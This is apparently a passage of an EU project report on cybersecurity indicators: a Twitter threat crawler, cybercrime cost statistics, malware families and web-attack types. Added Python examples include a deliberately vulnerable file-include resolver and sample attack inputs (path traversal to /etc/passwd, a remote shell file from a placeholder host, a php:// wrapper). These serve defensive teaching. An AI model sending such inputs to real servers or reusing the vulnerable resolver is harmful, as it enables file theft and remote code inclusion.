Twitter is one of the best-known online social networks and has gained enormous popularity in recent years. Its service is microblogging, a form of blogging in which the size of a posted message is limited by the system. Twitter also popularized the hashtag as a way to group conversations and let users follow a particular topic easily. Given the variety of hashtags, their grouping properties and the real-time nature of the service, Twitter is a valuable source on the real-time evolution of discussion about current issues of global interest and on trends in various domains, in our case cybersecurity. Twitter is therefore the main target of the Social Network Analysis toolset of WP5.

The Twitter Cybersecurity Social Network Analyzer (CSNA) is CTI's tool for collecting into a database large numbers of tweets related to cybercrime (threats) and to the cybersecurity markets. It consists of two parts, the Twitter Crawler and the Social Network Analyzer proper. This separation keeps the CSNA easy to interface with crawler modules for other social networks: the Twitter Crawler is not "hardwired" into the CSNA.

The Twitter CSNA uses the Twitter Streaming API. "Streaming" means that once a connection is opened it is kept open and active for the duration of the session, much like a circuit-switched telephone connection. Because the HTTP connection stays open, every tweet matching the search criteria is delivered in real time without re-establishing the connection or, possibly, violating its time limits.
The Twitter Streaming API is thus one of the most effective and efficient ways of retrieving large volumes of matching data without the danger of exceeding rate limits or losing the connection during downloads. The data flow in the SAINT Cybersecurity Social Network Analyzer can be summarized in the following steps:

1. Setting up a search query: A query containing search keywords, i.e. hashtags, is created and passed to the crawler script as a parameter, starting a search for tweets that include those hashtags. The keywords (hashtags), and the tweets that SAINT's CSNA collects for them, fall into two categories:
• Markets corresponding to cybersecurity: bug bounty programs, security contests and vulnerability markets.
• Threats: malware, ransomware, botnets and Trojans.

2. User authentication (OAuth): An Open Authorization request is created by the app registered in the Twitter account from which the API keys, API secrets, access tokens and access token secrets were obtained, as dictated by the OAuth protocol and Twitter's policies. In this way CTI's Twitter Crawler is granted access to the Twitter platform and, in particular, to the Streaming API used to search for and gather tweets as users create them.

3. Data collection (tweets): The Twitter Crawler searches for and downloads in real time the raw tweets matching the hashtag queries above, storing them on CTI's server (as large JSON files) and in the database (the NoSQL MongoDB DBMS). Respecting Twitter's rate limits and privacy/security policies, the Crawler accesses only publicly available information, never private accounts or information.

4. Data cleaning and pre-processing: Various pre-processing techniques are applied to find invalid records and transformations and to bring the data into the machine-readable format required by the Social Network Analyzer and its modules.

5. Modelling and analysis: Natural Language Processing, regular expression analysis and other data analysis techniques (e.g. statistical models) are applied to the tweets collected on the CTI server, transforming the input into suitably formatted representations (line charts of hashtag and term trends, bar plots).

6. Result presentation (visualization): Finally, the retrieved data are visualized, producing:
• interactive bar plots (histograms): most used hashtags, user mentions and word terms, in both the threats and the markets section. As future work, a function for selecting and displaying different time intervals (e.g. last month, last week) will be added.
• interactive time-series line charts: time-series analysis for monitoring emerging topics over time. Further implementation will take place until the end of the project, as more threats are integrated into the time-series analysis.

These charts give data analysts a quick and easy representation of the data. With every chart a CSV file containing the underlying data is also available for download, suitable for further analysis in other applications. CSV is used because it is:
• human-readable and easy to edit manually,
• simple to implement and parse,
• processed by almost all existing applications,
• a straightforward information schema,
• fast to handle,
• smaller than comparable data file formats,
• considered a standard format,
• compact,
• manageable by Microsoft Excel, Magento and similar programs,
• suitable for and widely used in statistical analysis.

Files exported from the CSNA's data analysis tool, and the corresponding datasets produced by the Twitter sub-crawlers, are therefore exported in CSV format too. The SAINT Twitter CSNA is thus a tool for monitoring trending topics in some of the ENISA Top 15 threats, as well as the day-to-day fluctuation of bug bounty programs and cybersecurity-related markets, using human intelligence to mine and correlate threats and their impact on the markets.
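The following, as an added example and not the CTI CSNA's own code, shows the cleaning, categorisation and counting stages (steps 1, 4, 5 and 6 above) run over four constructed tweets in the shape of Streaming API JSON records, and the CSV export of the result. The two keyword groups mirror the categories named in step 1; the stop-word list, the term regex and the CSV columns are choices made for this example.

```python
"""Added example (not the CTI CSNA code): pre-processing and counting stage
of a Twitter crawler pipeline as described in 4.12.

Input is newline-delimited JSON as a streaming crawler would store it; the
records below are constructed and carry only the fields this stage needs.
Output is per-category counts of hashtags, user mentions and word terms,
plus a CSV rendering of them (the per-chart download described in step 6).
"""
import csv
import io
import json
import re
from collections import Counter

# Keyword groups taken from the two categories in step 1 (lower-cased).
CATEGORIES = {
    "markets": {"bugbounty", "bugbounties", "securitycontest", "vulnerabilitymarket"},
    "threats": {"malware", "ransomware", "botnet", "botnets", "trojan"},
}

# Constructed sample tweets, one JSON object per line.
SAMPLE_TWEETS_JSON = """
{"id_str":"1","text":"New #bugbounty payout table published by @examplevendor","entities":{"hashtags":[{"text":"BugBounty"}],"user_mentions":[{"screen_name":"ExampleVendor"}]}}
{"id_str":"2","text":"Emotet #malware wave spreading via spam, C2 down for #botnet","entities":{"hashtags":[{"text":"malware"},{"text":"botnet"}],"user_mentions":[]}}
{"id_str":"3","text":"RT @researcher: #ransomware samples and #malware iocs","entities":{"hashtags":[{"text":"Ransomware"},{"text":"Malware"}],"user_mentions":[{"screen_name":"researcher"}]}}
{"id_str":"4","text":"lunch","entities":{"hashtags":[],"user_mentions":[]}}
"""

STOPWORDS = {"and", "via", "for", "by", "the", "rt", "new", "of", "to", "a", "in"}
TERM_RE = re.compile(r"[a-z0-9]{3,}")  # terms of at least three characters


def categorise(hashtags):
    """Return the set of categories whose keyword group matches any hashtag."""
    tags = {h.lower() for h in hashtags}
    return {cat for cat, words in CATEGORIES.items() if tags & words}


def analyse(json_lines):
    """Count hashtags, mentions and terms per category.

    Tweets matching no category are dropped (step 4). Returns
    {category: {"hashtags": Counter, "mentions": Counter, "terms": Counter}}.
    """
    result = {cat: {"hashtags": Counter(), "mentions": Counter(), "terms": Counter()}
              for cat in CATEGORIES}
    for line in json_lines.strip().splitlines():
        try:
            tweet = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed record from the crawler
        ents = tweet.get("entities", {})
        hashtags = [h["text"] for h in ents.get("hashtags", [])]
        mentions = [m["screen_name"] for m in ents.get("user_mentions", [])]
        cats = categorise(hashtags)
        if not cats:
            continue
        # remove hashtags, mentions and URLs before counting plain terms
        plain = re.sub(r"(#\w+|@\w+|https?://\S+)", " ", tweet.get("text", "").lower())
        terms = [t for t in TERM_RE.findall(plain) if t not in STOPWORDS]
        for cat in cats:
            result[cat]["hashtags"].update(h.lower() for h in hashtags)
            result[cat]["mentions"].update(m.lower() for m in mentions)
            result[cat]["terms"].update(terms)
    return result


def to_csv(result):
    """Render the counts as CSV text with columns category,kind,item,count."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["category", "kind", "item", "count"])
    for cat in sorted(result):
        for kind in ("hashtags", "mentions", "terms"):
            for item, n in result[cat][kind].most_common():
                writer.writerow([cat, kind, item, n])
    return buf.getvalue()


if __name__ == "__main__":
    print(to_csv(analyse(SAMPLE_TWEETS_JSON)))
```

A tweet whose hashtags hit both groups is counted in both, which is what the page's "threats and markets" correlation needs; hashtags are taken from the `entities` field rather than re-parsed from `text`, because the API already resolves them and the text of a retweet may be truncated.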


The 12 indicators selected for integration into the SAINT version of the Global Security Map (GSM) tool provided by CYBE are those outlined above (4.1 to 4.12). They contribute to an enhanced global view of cybersecurity issues; a snapshot of that global view is shown in Figure 4-1 below.

Figure 4.1: Screenshot SAINT Global Security Map – globalsecuritymap.com/saint

The GSM can also generate screenshots for individual countries showing their levels of cybersecurity activity, which will be enhanced by the addition of the selected SAINT indicators. An example screenshot (Germany) is shown in Figure 4-2 below, followed by one of Finland in Figure 4-3. In brief comparative terms, Germany ranks high on the SAINT GSM scale while Finland ranks low, and a high rank equates to worse security: the country at #1, the top of the ranking, has the worst levels of cybersecurity on its Autonomous Systems, while the country at the bottom of the ranking has the lowest levels of cybercriminal activity detected on its ASes.


Figure 4.2:Screenshot SAINT Global Security Map- sample country detail (Germany) – globalsecuritymap.com/saint

NB: Germany (DE) is ranked #8 of 218 countries measured for cybersecurity issues; the lower the number, the more cybersecurity issues.


Figure 4.3:Screenshot SAINT Global Security Map- sample country detail (Finland) – globalsecuritymap.com/saint

Finland (FI) is ranked #218 of 218 countries measured for cybersecurity issues; the lower the number, the more cybersecurity issues.


5 Indicators - Econometrics

Econometrics means economic measurement [12]: in the strict sense, the measurement of economic systems in an empirical context. Central to it is the processing of economic data with mathematical and statistical procedures in order to test economic theory and support economic models. Economic theory itself is often qualitative, as demand theory illustrates: when the price of a good falls, demand for it rises, and when the price rises, demand falls; the theory therefore posits a negative relationship between price and demand. Econometrics verifies the theory for specific goods by applying mathematical and statistical tools to price and demand data and estimating quantitative parameters, so that the theoretical predictions of the model can be checked against observation. Applied to cybersecurity, econometric modelling can be used to build new models specific to the industry, or to verify data on goods in the marketplace and on differences in supply and demand. Such models can also verify investment data in the cyber industry, with direct application to improving Return on Investment (ROI) calculations, and so provide data of benefit to policy makers, governments, companies and organizations.

5.1 Online population experienced cybercrime (EU)

Nomenclature:
There are two related definitions. Cyber-dependent crimes are offences that can only be committed via a computer, computer network or other form of information and communications technology (ICT). These include not only frauds that by their very definition occur only online, for example online shopping and auction scams (where the victim buys supposedly legitimate goods through an internet site and the goods are fake or are never provided). Cyber-enabled crimes are traditional crimes whose scale or reach can be increased by the use of ICT but which, unlike cyber-dependent crimes, can be committed without it: for example ticket fraud (purchasing tickets in advance which are never supplied or turn out not to be valid), as well as non-fraud crimes such as offences involving online harassment or obscene publications.

Metrics & Econometric analysis:
Worldwide - 700 million people in 20 countries experienced some form of cybercrime [13]:
● an increase of 15% from 2014 (594 million people were affected by cybertheft in 2014);
● within the 20 countries (including 7 from the EU: FR, DE, IT, NL, ES, SE, UK) the share of the online population which experienced cybercrime was 36.21%.

SAINT survey of respondents, showing the share of the online population which experienced cybercrime (EU adult population 2017 = 378 million, Eurostat). Question: "Have you experienced a cybercriminal action in the last 12 months?"
● 14.25% (of EU population = 54 million) - in a personal capacity
● 23.93% (of EU population = 91 million) - at work
● 9.12% (of EU population = 34 million) - personally and at work
● 52.71% (of EU population = 199 million) - no

Therefore, in total, those in the EU experiencing a cybercriminal action in the last 12 months:
● 47% of the EU population
● 177 million EU online users

EU - From SAINT's comparative and econometric analysis [14] in conjunction with the 2017 Norton Cyber Security Insights Report (an annual survey of more than 21,000 consumers globally), the online EU population which experienced cybercrime was:
● 36.36% of the EU population
● 142 million EU people

12 Econometrics - https://www.chegg.com/homework-help/definitions/econometrics-12
13 Cybercrime victims globally - 02 2018 - https://www.symantec.com/security-center/threat-report

5.2 Time spent / lost per victim of cybercrime

Nomenclature:
The time spent or lost as a result of being a victim of cybercrime, in order to determine and remediate the problems caused.
N.B. This is a new and important factor, previously neglected, that SAINT's econometric analysis [15] introduces into the analysis of the costs of cybercrime alongside the 2017 Norton Cyber Security Insights Report (see 5.1 above).

Metrics & Econometric analysis:
Time spent by a cybercrime victim in 2017 (global average, hours lost per victim) [16]:
● 23 hours

EU - From SAINT's econometric analysis [17] in conjunction with the 2017 Norton Cyber Security Insights Report (an annual survey of more than 21,000 consumers globally), the time lost per EU victim of cybercrime in 2017 was:
● 16 hours lost on average per victim of cybercrime within the EU
● € 63 billion is the total cost to the EU economy of time spent or lost as a result of being a victim of cybercrime

5.3 Cost of cybercrime (EU)

Nomenclature:
Understanding the scale or prevalence of cybercrime is also a key requirement for estimating its costs.

Metrics & Econometric analysis:
Worldwide - 700 million people in 20 countries experienced some form of cybercrime [18]:
● at a direct cost of $172 billion to consumers in 20 countries (including 7 from the EU: FR, DE, IT, NL, ES, SE, UK)

EU - From SAINT's econometric analysis [19] in conjunction with the 2017 Norton Cyber Security Insights Report (an annual survey of more than 21,000 consumers globally), the cost of cybercrime to the EU was:
● € 31 billion as direct cost to the EU economy
● € 63 billion as indirect cost to the EU economy in time spent or lost
● = € 94 billion as the total cost to the EU economy

14 SAINT surveys & comparative econometric analysis (to be published in 2018)
15 SAINT surveys & comparative econometric analysis (to be published in 2018)
16 Cybercrime victims globally - 02 2018 - https://www.symantec.com/security-center/threat-report
17 SAINT surveys & comparative econometric analysis (to be published in 2018)
18 Cybercrime victims globally - 02 2018 - https://www.symantec.com/security-center/threat-report

5.4 Cost of a data breach

Nomenclature:
The cost of an event in which an individual's name, together with a medical record, a financial record or a debit card, is potentially put at risk.

Metrics & Econometric analysis:
From the IBM/Ponemon 2017 report [20] (419 companies in 13 country or regional samples), the global average cost of a data breach is down on previous years:
● 2016 = € 3.28 million; 2017 = € 2.97 million
● 10% one-year decrease in average total cost
● € 116 is the average cost per lost or stolen record
● 11.4% one-year decrease in the per capita cost
● 27.7% is the likelihood of a recurring material data breach over the next two years
● 2.1% increase in the likelihood of a recurring material data breach
● the average size of a data breach increased 1.8% to 24,089 records

5.5 Cost to individuals of cybersecurity measures

Nomenclature:
Desktop computers and laptops are commonly targeted to gather passwords or financial account information, or to build a botnet for attacking another target. Smartphones, tablet computers, smart watches and other mobile devices, including quantified-self devices such as activity trackers, have sensors (cameras, microphones, GPS receivers, compasses and accelerometers) which could be exploited, and they may collect personal information, including sensitive health information. Wi-Fi, Bluetooth and phone networks on any of these devices could be used as attack vectors, and sensors might be remotely activated after a successful breach.

Metrics & Econometric analysis:
SAINT survey with econometric analysis of respondents, showing what the online population spends on cybersecurity. Question: "What do you estimate your personal spend on cybersecurity was in 2017?"
● < € 100: 42.86%
● € 101-250: 18.18%
● € 250-1000: 5.19%
● € 1000+: 3.90%

19 SAINT surveys & comparative econometric analysis (to be published in 2018)
20 Ponemon Institute's 2017 Cost of Data Breach Study: Global Overview - 02 2017 - https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN

5.6 Cost to enterprises of cybersecurity measures

Nomenclature:
The wide range between the lower and higher ends of network security cost corresponds to the large variety of available solutions. For smaller SMEs at the lower end of the spectrum there are systems such as business VPNs and e-mail security solutions, which help protect a business from specific threat types (such as phishing) on a smaller scale. For medium-sized SMEs up to large organisations, the higher-priced systems are often full-featured network monitoring solutions with advanced security event logging and detection capabilities; they can help shield an organization from large-scale attacks on its network and catch intrusions before they do damage.
Based only on network security software: for small SMEs there are some free open-source systems, and paid systems start at as little as € 50 per year for a limited set of threats (e.g. VPN, e-mail, anti-virus). At the higher end, systems can cost as much as € 6,000 per year, with one smaller system reaching € 24,000 for a single year of use. Overall, analysis shows that in its first year of using network security software the average SME should budget around $1,400 per annum [22].

Metrics & Econometric analysis:
According to research carried out in 2015, the ideal spend on cybersecurity is 9.8 to 13.7% of the IT budget [21]. The factors that should be considered when assessing an enterprise's budget for cybersecurity measures:
● Discover the inventory of assets (end-user devices, applications, network devices, data repositories, supply chain/partners).
● Detect the vulnerabilities and weaknesses of these assets, and establish which threats could compromise each of them.
● Determine and prioritize investments in technologies, skills and processes (the controls and countermeasures).
● Base decisions on the probability/impact matrix produced by the Discover and Detect phases.
● Deploy controls to close vulnerabilities across assets and defend against the identified threats.

21 Determining How Much to Spend on Your IT Security - 2015 - https://www-03.ibm.com/industries/ca/en/healthcare/documents/IDC_Canada_Determining_How_Much_to_spend_on_Security_-_Canadian_Perspective_2015.pdf
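As an added illustration of the Discover / Detect / Determine / Deploy procedure above (example code written for this edit, not from the report or the cited IDC study), the following ranks candidate controls by the expected loss they avoid per euro spent and selects them within a security budget set at the lower bound of the quoted 9.8-13.7% range. The risk register, the control catalogue and the scoring of risk as probability times impact are constructed for the example; the greedy ranking is a common heuristic rather than an optimum, and it ignores overlap between controls that mitigate the same risk.

```python
"""Added example (not from the SAINT report): turning the Discover / Detect /
Determine / Deploy steps of 5.6 into a ranked control list under a budget.

Assumptions made here, not stated by the report: risk is scored as
annualised expected loss = probability x impact; each control lists the
(asset, threat) pairs it mitigates and the fraction of that expected loss
it removes; controls are chosen greedily by loss avoided per euro until the
budget is used up. All figures are constructed.
"""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Risk:
    asset: str
    threat: str
    probability: float  # annual likelihood, 0..1 (Detect step)
    impact: float       # loss in EUR if it happens (Detect step)

    @property
    def expected_loss(self) -> float:
        return self.probability * self.impact


@dataclass(frozen=True)
class Control:
    name: str
    annual_cost: float
    # (asset, threat) -> fraction of that risk's expected loss removed
    mitigates: dict = field(default_factory=dict)


# Constructed risk register (output of Discover + Detect).
RISKS = [
    Risk("mail gateway", "phishing", 0.80, 40_000),
    Risk("customer db", "sql injection", 0.30, 250_000),
    Risk("laptops", "ransomware", 0.50, 60_000),
    Risk("vpn", "credential stuffing", 0.40, 30_000),
]

# Constructed control catalogue (candidates for the Determine step).
CONTROLS = [
    Control("email filtering + user training", 6_000,
            {("mail gateway", "phishing"): 0.7, ("laptops", "ransomware"): 0.3}),
    Control("web app firewall + code review", 20_000,
            {("customer db", "sql injection"): 0.8}),
    Control("MFA on VPN", 3_000, {("vpn", "credential stuffing"): 0.9}),
    Control("endpoint backup + EDR", 15_000, {("laptops", "ransomware"): 0.8}),
    Control("gold-plated SIEM", 60_000,
            {("customer db", "sql injection"): 0.2, ("laptops", "ransomware"): 0.2}),
]


def security_budget(it_budget: float, share: float = 0.098) -> float:
    """Security budget as a share of the IT budget (9.8% is the lower bound quoted in 5.6)."""
    if not 0 < share < 1:
        raise ValueError("share must be a fraction between 0 and 1")
    return it_budget * share


def loss_avoided(control: Control, risks) -> float:
    """Expected annual loss removed by one control across the register."""
    by_key = {(r.asset, r.threat): r for r in risks}
    return sum(by_key[k].expected_loss * frac
               for k, frac in control.mitigates.items() if k in by_key)


def prioritise(risks, controls, budget: float):
    """Greedy selection by loss avoided per euro within the budget.

    Returns (chosen_names, total_cost, total_loss_avoided). Greedy-by-ratio
    is a heuristic: it does not revisit overlapping mitigations.
    """
    ranked = sorted(controls,
                    key=lambda c: loss_avoided(c, risks) / c.annual_cost,
                    reverse=True)
    chosen, spent, avoided = [], 0.0, 0.0
    for c in ranked:
        if spent + c.annual_cost <= budget:
            chosen.append(c.name)
            spent += c.annual_cost
            avoided += loss_avoided(c, risks)
    return chosen, spent, avoided


if __name__ == "__main__":
    budget = security_budget(300_000)  # EUR 29,400 on a EUR 300,000 IT budget
    names, spent, avoided = prioritise(RISKS, CONTROLS, budget)
    print(f"budget {budget:,.0f}: chose {names}; spend {spent:,.0f}; "
          f"expected loss avoided {avoided:,.0f} per year")
```

On the constructed register the cheap controls with high ratios (mail filtering, MFA) are picked before the expensive SIEM even though the SIEM touches two risks, which is the point of ranking by loss avoided per euro rather than by coverage; a real exercise would also model control dependencies and the residual risk left after each pick.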

5.7 Cost to governments of cybersecurity measures

Nomenclature:
Governments have conflicting priorities for expenditure: bringing transformative change to their organizations while pursuing compliance-oriented priorities. Cloud solutions, cybersecurity and analytics are the top technologies targeted for new and additional spending, while data centre infrastructure is the area most commonly targeted for cost savings. Within cybersecurity, consideration is given to security, safety and risk; governance, compliance and regulations; and technology initiatives/improvements.

Metrics & Econometric analysis:
As a comparison, the U.S. government spent $14 billion on cybersecurity in 2017 and intends to spend $19 billion in 2018 [23].
Gartner's 2018 CIO Agenda Survey gathered data from 3,160 CIO respondents in 98 countries across major industries, including 461 government CIOs. Government CIOs said they plan to increase spending on business intelligence and analytics (16%) and on data management (6%) in 2018. The survey found that digital business/digital transformation is the first priority for government, with the exception of defence and intelligence agencies (6%); the other government priorities are security, safety and risk (13%), governance, compliance and regulations (12%), and technology initiatives/improvements (11%) [24].

5.8 Number of individuals working in cybersecurity (2018 EU)

Nomenclature:
Cybersecurity professionals worldwide face an ever-evolving threat landscape that many feel ill-equipped to manage. Data breaches at corporations, educational institutions and government agencies continue to erode public confidence in the state of cybersecurity. The emergence of consumer goods such as wearable devices and self-driving cars, alongside the increasing connectivity of the systems managing critical infrastructure such as power plants and traffic signals, is creating new threats to public safety, privacy and economic stability.

Metrics & Econometric analysis:
In 2018 the US employs ~780,000 people in cybersecurity positions [25]. Scaling by population, the EU should therefore have been employing ~2 million by the end of 2017 (actual number unknown), at a cost of ~$15 billion.
At the same time the cybersecurity industry faces a gender gap; for example in the US, 50 percent or more of those graduating from college in the cybersecurity field

22 Network Security Software - 2018 - https://www.capterra.com/network-security-software/
23 US expenditure on cyber-security - 2018 - https://www.cio.com/article/3032553/cyber-attacks-espionage/obama-wants-more-cybersecurity-funding-and-a-federal-ciso.html
24 Gartner 2018 CIO Agenda Report - 2018 - https://www.gartner.com/technology/cio-trends/cio-agenda/
25 US employed in cyber-security - 06 2017 - https://www.csoonline.com/article/3200024/security/cybersecurity-labor-crunch-to-hit-35-million-unfilled-jobs-by-2021.html

5.9 Estimates for cybersecurity personnel needed (by 2020 EU)

Nomenclature:
US - nearly half of the 4,000 businesses surveyed about their demand for specialists in the field said they were finding it difficult to fill openings. The situation is similar within the EU. The shortage is partly due to candidates who are either unqualified, or qualified but not interested in this career path. Training courses are scarce, the increased demand for cybersecurity professionals is relatively recent, and universities have yet to respond by incorporating it into their curricula.

Metrics & Econometric analysis:
Currently (2018) it is estimated that as many as 1 million cybersecurity openings globally are going unfilled [26].
There will be an estimated 3.5 million unfilled cybersecurity jobs globally by 2020 [27].
Current estimates for the EU (based on its percentage of the G20) predict that as many as 200,000 cybersecurity openings are going unfilled, and therefore a shortage of 700,000 by 2020 [28].

26 Mitigating the Cybersecurity Skills Shortage - 2017 - http://www.cisco.com/c/dam/en/us/products/collateral/security/cybersecurity-talent.pdf
27 Unfilled cyber-security jobs - 2018 - https://cybersecurityventures.com/jobs/
28 ENISA - Rome CTI Workshop - 11 2017 - CTI – EU | Bonding EU Cyber Threat Intelligence

6 Indicators - Cybercrime Activity

As shown in Cyber Security in the European Union [29], cybercrime "victimisation" surveys in 21 countries have revealed that the number of both individual and institutional victims is significantly higher than for "conventional" forms of crime. Much of the foundation of EU views and laws on cybercrime and cybersecurity is the Budapest Convention (the 2001 Convention on Cybercrime), the first global instrument to address cybercrime. Its main objective is to pursue a common criminal policy aimed at protecting society against cybercrime, by adopting appropriate legislation and fostering international cooperation. The convention was promoted by the Council of Europe (CoE) and has been signed by CoE members as well as several non-European countries, including the US. Although all EU member states have signed the convention, several have not yet ratified it [30].

6.1 Malware

Nomenclature:
Malware is short for "malicious software": computer programs designed to infiltrate and damage computers without the user's consent.

Examples:
Malware is the general term covering all the different types of threat to computer security, such as Trojans, viruses and worms. It also covers spyware, ransomware, adware, rootkits, keyloggers and APTs (advanced persistent threats), as well as potentially unwanted applications (PUA).

Usage:
As of January 2019, five of the top 10 malware in active circulation are involved in cryptojacking, i.e. the use of a user's computer, without consent, to mine cryptocurrencies. Other malware primarily steals banking credentials, user passwords, FTP passwords, session cookies and personal data.

Metrics:
As of March 2019, 876 million malware samples had been detected in total; every day some 350,000 new malicious programs (malware) and potentially unwanted applications (PUA) are detected [31]. Older malware persists even when apparently non-operational: two years after its command and control (C&C) was disabled, the WannaCry ransomware worm was still found on 500,000 infected computers worldwide (March 2019).

29 Cyber security in the European Union - 2013 - http://www.europarl.europa.eu/eplibrary/Cyber-security-in-the-European%20Union.pdf
30 Budapest Convention on Cybercrime - https://www.coe.int/en/web/conventions/full-list/-/conventions/treaty/185
31 AV Test - Mar 2019 - https://www.av-test.org/en/statistics/malware/


The Top 10 malware – Jan 2019 [32]

• Coinhive – Cryptominer designed to mine the Monero cryptocurrency when a user visits a web page, without the user's knowledge or approval and without sharing the profits with the user. The implanted JavaScript consumes a large share of the end user's computational resources and can crash the system.
• XMRig – Open-source CPU mining software for the Monero cryptocurrency, first seen in the wild in May 2017.
• Jsecoin – JavaScript miner that can be embedded in websites. With JSEcoin the miner runs directly in the browser in exchange for an ad-free experience, in-game currency and other incentives.
• Cryptoloot – Cryptominer that uses the victim's CPU or GPU power and existing resources for cryptomining (adding transactions to the blockchain and releasing new currency). It competes with Coinhive by asking websites for a smaller percentage of revenue.
• Emotet – Advanced, self-propagating, modular Trojan. Emotet was once a banking Trojan and is now used mainly as a distributor of other malware and malicious campaigns. It uses multiple methods to maintain persistence and evasion techniques to avoid detection, and spreads through phishing spam e-mails containing malicious attachments or links.
• Nivdort – Multipurpose bot, also known as Bayrob, used to collect passwords, modify system settings and download additional malware. It is usually spread via spam e-mails, with the recipient address encoded in the binary so that each file is unique.
• Dorkbot – IRC-based worm designed to allow remote code execution by its operator and the download of additional malware to the infected system.
• Ramnit – Banking Trojan that steals banking credentials, FTP passwords, session cookies and personal data.
• Smokeloader – Second-stage downloader for Windows used to fetch other malware or plugins. Smokeloader uses various anti-analysis tricks for deception and self-protection, and is commonly used to load many known families, including the Trickbot Trojan, the Azorult infostealer and Panda Banker.
• Authedmine – A version of the JavaScript miner Coinhive. Like Coinhive, Authedmine is a web-based miner of the Monero cryptocurrency that runs when a user visits a web page; unlike Coinhive, it is designed to require the website user's explicit consent before the mining script runs.

Also the top 3 malware for mobiles (Android):

• Triada – Modular backdoor for Android that grants super-user privileges to downloaded malware and helps it embed itself in system processes. Triada has also been seen spoofing URLs loaded in the browser.
• Guerilla – Android ad-clicker able to communicate with a remote command and control (C&C) server, download additional malicious plugins and perform aggressive ad-clicking without the consent or knowledge of the user.
• Lotoor – Hack tool that exploits vulnerabilities in the Android operating system to gain root privileges on compromised mobile devices.

32 Top 10 malware - Jan 2019 - https://blog.checkpoint.com/2019/01/14/december-2018-most-wanted-malware-smokeloader-crypto-malware-ransomware/

6.1.1 Trojans
A Trojan (named after the Trojan Horse of Troy) is malware disguised as a normal, legitimate file or program. Trojans in the Internet landscape perform a wide variety of tasks; most are aimed at taking control of the user's computer, stealing data and installing further malware on the victim's machine.

6.1.2 Viruses (computer)
Viruses differ from other forms of malware in that they are contagious, i.e. self-replicating: they copy themselves into other files or onto other computers without the user's consent.

6.1.3 Worms
A worm is malware that spreads across an entire network of devices on its own, moving from one computing device to another without user action.

6.2 Web based attacks

Nomenclature Examples Usage Metrics

Nomenclature:
Web based attacks primarily target information security infrastructures and constantly evolve. These legacy network-based attacks have largely been replaced by more sophisticated web application-based attacks (see below).

Examples:
● NewskyAG - money mule scam.
● ESTdomains - cybercrime group.
● Microsoft Update Fixes RCE (Remote Code Execution) Vulnerability - primarily aimed @ MS Server 2016 33.

Usage:
Scanning for web server vulnerabilities and cross server attacks. Recently used in some DDoS and data breaches.

Metrics:
From earlier (2009): 350,000 affected websites and servers worldwide, with 103,351 attacks, involving 2,743 unique IP addresses, with 85 countries involved in RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack), and RCE (remote code execution) scanning, and 911 ASNs were involved 34.

6.2.1 RFI (remote file inclusion)
Remote File Include (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications. When web applications take user input (URL, parameter value, etc.) and pass them into file include commands, the web application might be tricked into including remote files with malicious code.
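The RFI mechanism described here, and the LFI variant described in the next subsection, both come down to how a page parameter is turned into a path before it is included. The following Python is an added example and not code from the SAINT report: a deliberately vulnerable resolver of the `include($_GET['page'])` kind beside a hardened one that refuses remote URLs, traversal outside the template directory and anything not on an allowlist. The template directory, the allow-listed template names and the sample inputs are assumptions made for the example.

```python
"""Dynamic file include: vulnerable resolver beside a hardened one.

Added example (not from the SAINT report). TEMPLATE_DIR, ALLOWED_PAGES and the
sample inputs are assumptions made for the example.
"""
import os
from typing import Optional
from urllib.parse import urlparse

TEMPLATE_DIR = "/srv/app/templates"                           # assumed template root
ALLOWED_PAGES = {"home.html", "about.html", "contact.html"}   # assumed includable files


def resolve_include_vulnerable(page: str) -> str:
    """Mirrors include($_GET['page'])-style code: the parameter is joined onto the
    template directory with no checks. normpath shows the path the OS would open,
    so "../../../etc/passwd" resolves to /etc/passwd (LFI)."""
    return os.path.normpath(os.path.join(TEMPLATE_DIR, page))


def classify_include(page: str) -> str:
    """Return "ok" if the parameter may be included, otherwise the reason it was
    rejected. Checks run from the cheapest to the most specific."""
    if "\x00" in page:
        return "null-byte"              # classic trick to truncate an appended suffix
    if urlparse(page).scheme or page.startswith(("//", "\\\\")):
        return "rfi"                    # URL schemes (http://, ftp://, php:// wrappers) or UNC paths
    candidate = os.path.normpath(os.path.join(TEMPLATE_DIR, page))
    # Containment: after normalisation the path must still sit under TEMPLATE_DIR.
    # os.path.join discards TEMPLATE_DIR when page is absolute, so "/etc/passwd"
    # is caught here as well as "../" sequences.
    if os.path.commonpath([TEMPLATE_DIR, candidate]) != TEMPLATE_DIR:
        return "traversal"
    # Allowlist: only known template files, directly inside TEMPLATE_DIR.
    if os.path.dirname(candidate) != TEMPLATE_DIR or os.path.basename(candidate) not in ALLOWED_PAGES:
        return "not-allowlisted"
    return "ok"


def resolve_include_hardened(page: str) -> Optional[str]:
    """Return the path to include, or None when the parameter must be refused."""
    if classify_include(page) != "ok":
        return None
    return os.path.join(TEMPLATE_DIR, page)


# Constructed sample inputs of the kind seen in web server access logs.
SAMPLE_INPUTS = [
    "home.html",                                           # legitimate
    "../../../etc/passwd",                                 # LFI via traversal
    "/etc/passwd",                                         # LFI via absolute path
    "http://evil.example/shell.txt",                       # RFI
    "php://filter/convert.base64-encode/resource=index",   # RFI-style wrapper abuse
    "home.html\x00.jpg",                                   # null-byte truncation
    "config.php",                                          # real file, but not a template
]

if __name__ == "__main__":
    for p in SAMPLE_INPUTS:
        print(f"{p!r:55} vulnerable -> {resolve_include_vulnerable(p)!r:45} hardened -> {classify_include(p)}")
```

The containment check alone would still let a client include any file that happens to live under the template directory, which is why the allowlist is kept as a second layer; the classification string is what you would log so that traversal and RFI probes show up as distinct events.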

33 Microsoft Security Advisory 4022344 - May 2017 - https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2017/4022344
34 MALfi, A Cybercrime International Report - A Silent Threat - 2009 https://en.wikipedia.org/wiki/Jart_Armin

6.2.2 LFI (local file inclusion)
Local File Inclusion (LFI), or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application into including files on the web server by exploiting functionality that dynamically includes local files or scripts.

6.2.3 XSA (cross server attack)
XSA (also known as Cross-Server Attack) is a network security intrusion method which allows a malicious client to compromise security over a website or service on a server by using implemented services on the server that may not be secure.

6.2.4 RCE (remote code execution)
